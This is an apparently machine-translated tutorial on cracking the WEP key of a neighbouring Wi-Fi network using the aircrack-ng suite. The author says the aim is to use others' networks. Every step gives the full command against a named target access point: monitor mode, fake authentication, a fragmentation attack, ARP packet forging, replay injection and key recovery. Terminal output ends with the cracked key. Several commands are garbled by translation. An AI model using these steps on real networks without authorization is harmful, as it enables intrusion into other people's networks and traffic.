For the sake of interest, if you want to connect to a wireless wi-fi network in multiple places, the key is required. So it took me a few days to try the attack on the Internet. The process was as follows:
1. My Nic model is rt73 USB wireless LAN card. The above name is the complete name displayed in the Device Manager. I have downloaded the complete factory driver in XP, however, no driver is installed in Ubuntu.
2. First, you need to know the name and channel number of the target Wi-Fi network in the current environment. I use a USB boot to enter the bt3 tool. after entering the desktop, click the WiFi assistant tool in it to display the current network name and channel number. Write it down. For example, I noted down the current network name micorlink_sz and the channel number is 11.
3. Enter Ubuntu and insert a wireless Nic to ensure that the NIC is properly loaded and identified. If the NIC is normal, a prompt box is displayed, indicating that the ralink rt73 wireless Nic is loaded.
4. Create a new terminal to run: ifconfig-
Terminal display:
Wlan0 link encap: Ethernet hardware address 00: 0C: 43: 2a: 36: C4
Broadcast multicast MTU: 1500 hops: 1
Received data packet: 0 error: 0 discard: 0 overload: 0 frames: 0
Packet sending: 0 error: 0 discard: 0 overload: 0 carrier: 0
Collision: 0 sending queue length: 1000
Received byte: 0 (0.0 B) sent byte: 0 (0.0 B)
Parameter description: displays the complete PC network configuration.
Function: You can use this command to obtain the name and MAC address of your wireless network card.
5. Terminal run: airmon-ng start wlan0 11
Terminal display:
Interface chipset driver
Wlan0 ralink 2573 USB rt73usb-[phy1] (monitor mode enabled on mon0)
Parameter description: wlan0 indicates the name of the wireless network card to be loaded, and 11 indicates the channel number opened on the target network.
Function: When you run this command for the first time, you will be prompted to install the XX software of AI. You can use apt-Get install to install the software required by AI. This command is used to place your wireless network card in monitor mode, with the packet capture function. After running this command, you will see the alias of the wireless network adapter after being upgraded to the monitoring mode, that is, mon0. If you find that the channel is wrong, you can try it multiple times.
6. Run the terminal: airodump-ng -- IVS-W name-C 11 mon0.
Terminal display:
Bssid PWR rxq beacons # data, #/s ch mb enc cipher auth Essid
00: 1D: 73: de: 9C: F5-55 71 16605 14114 12 11 54. wep opn microlink_sz
00: 1D: 0f: 84: 06: 8C-53 0 31 0 0 6 54. WEP TP-LINK
00: 1D: 73: de: A8: 1D-63 99 17107 62334 11 54. wep opn microlink_sz
Bssid station PWR rate lost packets probes
(Not associated) 00: 11: F6: 88: 14: D6-69 0-1 0 61
(Not associated) 00: 1f: 3A: 97: B1: Ce-71 0-1 0 92
00: 1D: 73: de: 9C: F5 00: 1f: 3B: 16: 00: CB-69 1-12 8 5215 microlink_sz
00: 1D: 73: de: 9C: F5 00: 1f: 3B: A0: C2: 1b-69 54-6 18 4707 wxyz, microlink_sz
Parameter description: bssid indicates the MAC address of the AP. PWR indicates the strength of the AP signal. packet loss is serious if it is less than 10, which is difficult to crack. rxq indicates the interference; beacons is the packet sent and received, and data is included in the hop description; # data is a special packet that is received and can be used to crack. If it remains unchanged, it indicates that there is no client connection, which is more difficult to crack; ch is the channel number, Mb is the network connection speed, 54 is 54 MB, ENC, cipher, auth is the encryption method, display WEP can be cracked; Essid is the AP name, chinese names can be used only to block attacks.
Function: lists information about a Wi-Fi network. This window is open, so you don't have to worry about it.
7. Create a new terminal and run: aireplay-ng-1 0-e microlink_sz-A 001d73dea81d-H 000c432a36c4 mon0
Terminal display:
10:44:54 waiting for beacon frame (bssid: 00: 1D: 73: de: A8: 1D) on Channel 11
10:44:54 sending authentication request (Open System) [ack]
10:44:54 authentication successful
10:44:54 sending association request [ack]
10:44:54 Association successful (Aid: 1)
Parameter description: microlink_sz is the AP name; 001d73dea81d is the MAC address of the target network card to be cracked, which can be obtained in Step 6. Remove the colon in the middle; 000c432a36c4 is the MAC address of your network card, you can get it from step 4 or remove the colon. mon0 is the monitoring name obtained from Step 5.
Function: this command is mainly used for # AP with slow data growth. aireplay, as its name implies, means to resend a simulated packet sending. It is a spoofing command that connects to the AP. If the execution is successful, successful is displayed.
8. Run the following command on the terminal: aireplay-ng-5-B 001d73dea81d-H 000c432a36c4 mon0.
Terminal display:
10:54:18 waiting for beacon frame (bssid: 00: 1D: 73: de: A8: 1D) on Channel 11
10:54:18 waiting for a data packet...
Read 27 packets...
Size: 88, fromds: 0, Tods: 1 (WEP)
Bssid = 00: 1D: 73: de: A8: 1d
DeST. Mac = 00: 1E: Be: C7: B8: CA
Source MAC = 00: 1f: 3A: 52: BD: 73
0x0000: 0841 2c00 001d 73de a81d 001f 3A52 bd73. A,... s...: R. S
0x0010: 001e bec7 b8ca f021 2d42 0000 31f4 7340 .......! -B .. 1. s @
0x0020: b50a bd80 41fc 1d01 5103 5ec1 21fa 4a5e ...... a... Q. ^ .!. J ^
0x0030: f423 aced ff21 8623 664c 815b f58c f6e7 .#...!. # Fl .[....
0x0040: 8b8c 2b31 4319 2a9e f99c e895 af6a bb13... + 1C ..
0x0050: dd55 d2d7 0eda 68da. U... h.
Use this packet? Y
Saving chosen packet in replay_src-0415-105425.cap
10:55:12 data packet found!
10:55:12 sending Fragmented Packet
10:55:12 got relayed packet !!
10:55:12 trying to get 384 bytes of A keystream
10:55:12 got relayed packet !!
10:55:12 trying to get 1500 bytes of A keystream
10:55:13 got relayed packet !!
Saving keystream in fragment-0415-105512.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
Parameter description: 001d73dea81d indicates the MAC address of the target AP, 000c432a36c4 indicates the MAC address of the network card, and mon0 indicates the monitoring alias.
Function: after the previous successful attack, the system starts to collect # data for simulated cracking. If # data is not added, the command will be executed until a # data package is captured. Then, the program will ask you if you want to use this package to simulate attacks. Then, you can answer "Y. If the attack succeeds, it is displayed. A file name: fragment-xxxx-xxxx.xor file, which will be used immediately, is saved in the root directory (my computer ).
9, terminal run: packetforge-ng-0-A 001d73dea81d-H 000c432a36c4-k running 255.255.255-l running 255.255.255-y fragment-0415-105512.xor-W mrarp
Terminal display:
Wrote packet to: mrarp
Parameter description: 001d73dea81d is the MAC address to be cracked; 000c432a36c4 is your MAC address; fragment-0415-105512.xor is the eighth step display file name;
Function: prepares the cracking package and displays the generated file to mrarp.
10. Run the terminal: aireplay-ng-2-r mrarp-x 512 mon0.
Terminal display:
No source MAC (-h) specified. Using the device MAC (00: 0C: 43: 2a: 36: C4)
Size: 68, fromds: 0, Tods: 1 (WEP)
Bssid = 00: 1D: 73: de: A8: 1d
DeST. Mac = FF: FF
Source MAC = 00: 0C: 43: 2a: 36: C4
0x0000: 0841 0201 001d 73de a81d 000c 432a 36c4. A... s... C * 6.
0x0010: FFFF 8001 e4cb 8500 0039 fd12 ..
0x0020: 169e 7a6a b98d 8bd7 08d9 6bb3 fed2 5890... ZJ... k... X.
0x0030: d1bc d1ef 2bfe 0ec7 b11d 3032 246e 40c9 ...... + ...... 02 $ N @.
0x0040: a65a 27af. Z '.
Use this packet? Y
Saving chosen packet in replay_src-0415-110249.cap
Sending package XXXX.
Parameter description: mon0 is the alias of the wireless network card listening device; 512 is the attack speed; 1024 is the maximum value, generally 512.
Function: at the beginning of this step, select y and you will see that the number of sending packages is increasing, and the # data displayed in the first terminal is also increasing rapidly, just wait.
Run aircrack-ng-N 64-B 001d73dea81d name-01.ivs
Terminal display:
Opening name-01.ivs
Attack will be restarted every 5000 captured IVs.
Starting PTW attack with 40103 IVs.
Aircrack-ng 1.0 RC3
[00:00:11] tested 8 keys (got 40982 IVS)
KB depth byte (vote)
0 0/1 36 (58156) 8a (48492) B5 (48016) 86 (47920) 19 (47676)
1 0/1 39 (52472) 83 (47580) B2 (46496) D0 (46448) 29 (46312)
2 0/1 39 (53488) 22 (48804) FC (48144) 85 (48108) 55 (47784)
3 0/1 39 (54596) A7 (48580) 46 (48568) 76 (48392) 22 (47804)
4 0/7 04 (48432) BD (47996) 04 (47680) B9 (47524) 17 (47376)
Key found! [36: 39: 39: 39: 39] (ASCII: 69999)
Decrypted correctly: 100%
Parameter description: 001d73dea81d is to crack the target MAC address; name-01.ivs is a file generated before, in the root directory named by the name-xx.ivs, find the largest number that.
Function: As long as # data reaches 10000 or more, the cracked password is displayed and the corresponding ASCII code is displayed. If you are not lucky, just wait.
Reference: http://www.city009.cn/wep-wap-pojie-8.html